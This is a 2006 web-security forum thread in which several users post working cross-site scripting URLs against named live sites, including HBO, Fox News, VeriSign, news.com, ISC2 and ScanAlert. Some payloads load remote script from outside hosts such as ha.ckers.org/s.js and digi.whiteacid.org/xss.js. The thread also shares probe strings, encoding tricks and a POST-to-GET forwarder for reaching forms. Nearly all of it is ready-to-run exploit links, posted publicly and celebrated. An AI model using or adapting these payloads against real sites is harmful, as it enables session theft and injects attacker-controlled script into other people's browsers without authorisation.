[www.pepperjam.com]

This site has also had SQL injection vulns which revealed their AES encryption key. Seems they fixed that, but not the XSS.

http://national.citysearch.com/search?x=0&y=0&search_select=on&init_search=1&context=directory&miles=99&pre_geo_id2=&request_market_only=&query=%3cscript%20src%3Dhttp://ha.ckers.org/s.js%3e%3c/script%3e&cslink=cs_topbar_search&pre_csz=&pre_geo_id1=&store_where_for_comparison=USA&started=1&hotelAttraction=

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Anyone need a home loan? https://www.wamuhomeloans.com/cgi-bin/mqinterconnect.cgi?link=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.anywho.com/qry/wp_fap&lastname=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&Submit=Submit << Anywho.com

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

This one is interesting because it really is a DOM based XSS (not reflected). Scanners would have a tough time with this one. http://www.hbo.com/scripts/video/vidplayer_set.html?movie=/av/events/psa/ncta_psa+section=events+num=1115404066482+title=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%20PSA:%20%22From%20A%20Distance%22:%20Visit%20www.controlyourtv.org+tunein=

Here's the offending JavaScript:

function queryString(key){
var page = new PageQuery(window.location.search);
return unescape(page.getValue(key));
}

movie = queryString('movie');
section = queryString('section');
title = queryString('title');
num = queryString('num');
tunein = queryString('tunein');

And then way further down:

document.write( "<span class=\"title\">" + title + "</span><br>" );

- RSnake
Gotta love it. http://ha.ckers.org

http://search2.foxnews.com/search?ie=UTF-8&oe=UTF-8&client=my_frontend&proxystylesheet=my_frontend&output=xml_no_dtd&site=default_collection&sort=date%3AD%3AR%3Ad1&q=%22%3Balert%28%22XSS%22%29%3B%2F%2F

- RSnake
Gotta love it. http://ha.ckers.org

h**p://www.beliefnet.com/search/search_site_results.asp?search_for="><script src=http://ha.ckers.org/s.js></script>&to_search=whole_site

^^ not being displayed correctly due to the http regex!


on a side note i would insterested to learn of attack vectors being used.

personally iam testing with <>";=)moocow64 and then viewing/searching the source for moocow and then determing what characters are being echo'd.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 3 time(s). Last edit at 09/25/2006 11:20PM by digi7al64.

I can't read swedish but I think this is a big site: http://www.hemnet.se/bevakning/BevLogin.asp?service=hemnet&type=bev&action=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&username=&email=&reklam=N&htmlmail=N&error=-2&

- RSnake
Gotta love it. http://ha.ckers.org

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.verisign.com/cgi-bin/ssl/email-friend/email.cgi&chromeTitle=End%20of%20the%20Internet&check=yes&url=http://www.shibumi.org/eoti.htm&to_email=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%78%73%73%27%29%3C%2F%73%63%72%69%70%74%3E - VeriSign via POST


digi7al64, I personally use a modification of the short XSS location - http://ha.ckers.org/xss.html#XSSlocator2

'';!--"/><XSS>=&{()}

Then I search source for XSS and see how it handled it.

- Kyran

(Ericsson.se) it's attack of the Svedes: http://ha.ckers.org/expect.swf?http://www.ericsson.se

- RSnake
Gotta love it. http://ha.ckers.org

I think I'm going to make a list of the sites we XSS here. Just for a record.

- Kyran

wow.. i was gone for a day, and you guys managed to fill up more than a page of posts in this thread.. not to mention being /.'ed ^^

well good job on all of it, i'm glad to see this forum getting more recognition, which'll hopefully bring in more web app sec experts (and web app sploit experts) ..

digital64: the http regex is easily fixed by changing all the " to %22 (and space to %20).. i.e.:
h**p://www.beliefnet.com/search/search_site_results.asp?search_for=%22><script src=http://ha.ckers.org/s.js></script>&to_search=whole_site -> http://www.beliefnet.com/search/search_site_results.asp?search_for=%22><script%20src=http://ha.ckers.org/s.js></script>&to_search=whole_site

and as for the test injection i use: asdf'a"s>d<f>g;!-e=+r)(t%y\u/i i
why all the letters in between? because when the website \escapes alot of the special characters.. its harder for me to tell which ones when mashed together like ';!--"/>\< .. and i look for the 'asdf' ... but whenever i just randomly throw it into a website im visiting, its usually asdf'e"r>t<y> .. because it's fast to type.

kyran: i thought i should do the same for quicker reference, to throw into a sql database including the fields: TLD, vector, vector type, site category, and filter type .. but then i remembered i'm lazy with too many half done projects =__=

-maluc

haha maluc, for now I'm just making a LIST of the sites. Once it's done I'll think of making an xml document with it all, including attack vectors etc.

- Kyran

Maluc! You've been quoted! I was quoted too but it wasn't long enough to warrant a name. :P

http://weblog.infoworld.com/techwatch/archives/008062.html

- Kyran

and since we've been giving other sites the same treatment for mentioning sla.ckers:
http://www.ddj.com/TechSearch/not_found.jhtml;jsessionid=1BKYW43EIVWIKQSNDLRCKH0CJUNN2JVN?nftype=error&queryText=%22;alert(%22XSS%22);%22&site_id=3600005&_requestid=190824

i'll save myself the effort of checking slashdot though.. won't be as easy to find one.

-maluc

Slashdot would be a mission and a half.

- Kyran

also: http://www.ddj.com/TechSearch/not_found.jhtml;jsessionid=1BKYW43EIVWIKQSNDLRCKH0CJUNN2JVN?nftype=error&queryText=--%3E%3Cscript%3Eeval('if(document.getElementById(%22COPYRIGHTContainer%22).innerHTML!%3D%22%22)%7Bdocument.getElementById(%22COPYRIGHTContainer%22).innerHTML%3D%22%22;alert(%22XSS%22);%7D');%3C/script%3E%3Cb%22&site_id=3600005&_requestid=192557

it is quite spammy with its injection, so i added the check to only run once..

btw digital64: you also have to hex-encode brackets for link posting here, { -> %7B , } -> %7D ..

-maluc

for maluc...

http://subscribe.infoworld.com/cgi-win/ifwd.cgi?e=%22%3E%3Cscript%20src=http://digi.whiteacid.org/xss.js%3E%3C/script%3E&x=0&y=0&m=newsletter

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 2 time(s). Last edit at 09/26/2006 04:37AM by digi7al64.

More links about this part of the forum, gentlemen:
http://www.techworld.com/security/news/index.cfm?newsID=6966&pagtype=all

and: http://www.pcadvisor.co.uk/news/index.cfm?newsid=7175

- RSnake
Gotta love it. http://ha.ckers.org

Wow. 9 Articles about this specific thread so far.
Now if only we could get on news.com.com

- Kyran

By get on there do you mean find an XSS, or... ? ;)

- RSnake
Gotta love it. http://ha.ckers.org

Ahaha. Either way. Although I'm not sure how happy they would be if we found one before they post about us. ;)

- Kyran

I couldn't help myself.

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://news.com.com/2113-1038_3-6119515.html&toEmailAddress=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E <-- news.com.com

- Kyran

lol, i didn't even notice that you said i was quoted, kyran.. how nice. ^^
i guess my rants are good for something..

anyway, thanks for the dedication digital ^^ .. and i'll go ahead and continue with the new site auditing:

http://www.techworld.com/search/index.cfm?fuseaction=dosearch&thecriteria=asdf%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%3Cb+%22&Search=SEARCH&search_networking=1&search_storage=1&search_security=1&search_mobility=1&search_applications=1&search_opsys=1&search_midsizedbusiness=1&search_news=1&search_reviews=1&search_blogs=1&search_whitepapers=1&search_insight=1&search_casestudies=1&search_howto=1&search_briefings=1&search_interviews=1 html tag breakout
http://www.techworld.com/search/index.cfm?fuseaction=dosearch&channel_search=channel&search_reviews=1&search_news=1&search_insight=1&search_howto=1&search_whitepapers=1&search_casestudies=1&search_briefings=1&search_interviews=1&search_blogs=1&search_networking=1&search_storage=1&search_security=1&search_mobility=1&search_applications=1&search_opsys=1&search_midsizedbusiness=1&thecriteria=asdf%22%29%3Balert%28%22XSS%22%29%3Beval%28%22&Go=Go javascript function call breakout
http://www.techworld.com/account/login/index.cfm?fuseaction=login&currentloc=%2Fabout%2Fcommercial.cfm&currentlocparms=&userid=XSS+is+here%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&password=apple&login=login no breakout needed
http://www.pcadvisor.co.uk/search/index.cfm?thecriteria=asdf%22%29%3Balert%28%22XSS%22%29%3Beval%28%22&Search=GO&action=dosearch&search_news=1&search_reviews=1&search_features=1&search_blogs=1&search_downloads=1&searchorigin=header same javascript function call breakout (they're owned by the same company, IDG)

off to make some breakfast.. with a nice bit of ego boost :3

-maluc

kyran, although i think you said you use opera .. (in which i recommend opera8.54, because its the only view source that shows the changes, if the site/page.pl name doesn't change)

..but the WebDeveloper extension for firefox has an extremely useful feature for converting all POSTs to GETs .. as most POSTs still work, when submitted as GET

to expand on your find: http://news.com.com/2114-1038-6119515.html?toEmailAddress=%22%3EXSS+is+here%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cbr+%22&fromEmailAddress=%22%3EXSS+here+too%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E%3Cbr+%22&comments=and+here%3F%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS3%22%29%3C%2Fscript%3E&CAPTCHA_RESPONSE=&CAPTCHA_GUID=8a8f128e0dcbac55010deb0f55616c91

-maluc

http://www.digitmag.co.uk/search/index.cfm?fuseaction=dosearch&thecriteria=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Search=Go&search_news=1&search_blogs=1&search_reviews=1&search_features=1 no breakout, only double quotes " are filtered
http://www.digitmag.co.uk/search/index.cfm?fuseaction=dosearch&thecriteria=asdf%22%29%3Balert%28%22XSS%22%29%3Beval%28%22&Search=Go&search_news=1&search_blogs=1&search_reviews=1&search_features=1 again, same javascript function call breakout

digit is owned by the same company as MacWorld, TechWorld, and PCAdvisor .. so they all have similar holes but each its own unique one too _-_

-maluc

With all the media attention on XSS now, one would think that people would act on this information. But we still find XSS vulnerabilities in major sites, even ones that report on XSS being an issue! The problem is that most web developers have no security training at all.

It seems "Email to a friend"-style pages are almost always vulnerable to it.

- Kyran

are you hacker safe?

https://www.scanalert.com/SignUp.sa?adds106=2&act=step3&company.name=touchme%22%20onmouseover=%22alert('Hacker%20Safe?');%22

try to key in your company name ...

kirke: that works in IE and opera .. but not firefox, because the ending " in the link is unnecessary (the site adds one in too)

good work though, and it's sad to see who passes themselves off as web application security consultants and experts these days =.= .. their associates degree in web design and https://www.isc2.org/cgi-bin/login.cgi?Command=TempPassword&CertificateNumber=%3Cscript%3Ealert%28%22Yes%2C+this+is+the+International+Information+System+Security+Certification+Consortium.+And+Yes%2C+they+should+probably+uncertify+themselves..%22%29%3C%2Fscript%3E&LastName=&HomeCity=&x=9&y=8 membership is hardly worth the paper the check was written on to buy them. I'm not really sure what they spend their time doing during their 'audits' .. but this is stuff i could likely teach a ten year old to find, after two hours of explaining.

This is in no offense to the legitimately well-informed webappsec professionals out there, but you're about as rare as an xss-free site - and we all know how rare that is..

-maluc

some more scanalert ones: https://www.scanalert.com/Content.sa?sec=2&sub=4&send=Y&ref=&rid=&region=EN&name=XSS0%22+onmouseover%3D%22alert%28%27XSS0%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&company=XSS1%22+onmouseover%3D%22alert%28%27XSS1%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&url=XSS2%22+onmouseover%3D%22alert%28%27XSS2%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&phone=XSS3%22+onmouseover%3D%22alert%28%27XSS3%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&ext=XSS4%22+onmouseover%3D%22alert%28%27XSS4%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&email=XSS5%22+onmouseover%3D%22alert%28%27XSS5%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22 automagic in FF, mouseover any field in other browsers

and i love seeing the 11,400 views for this thread _-_

-maluc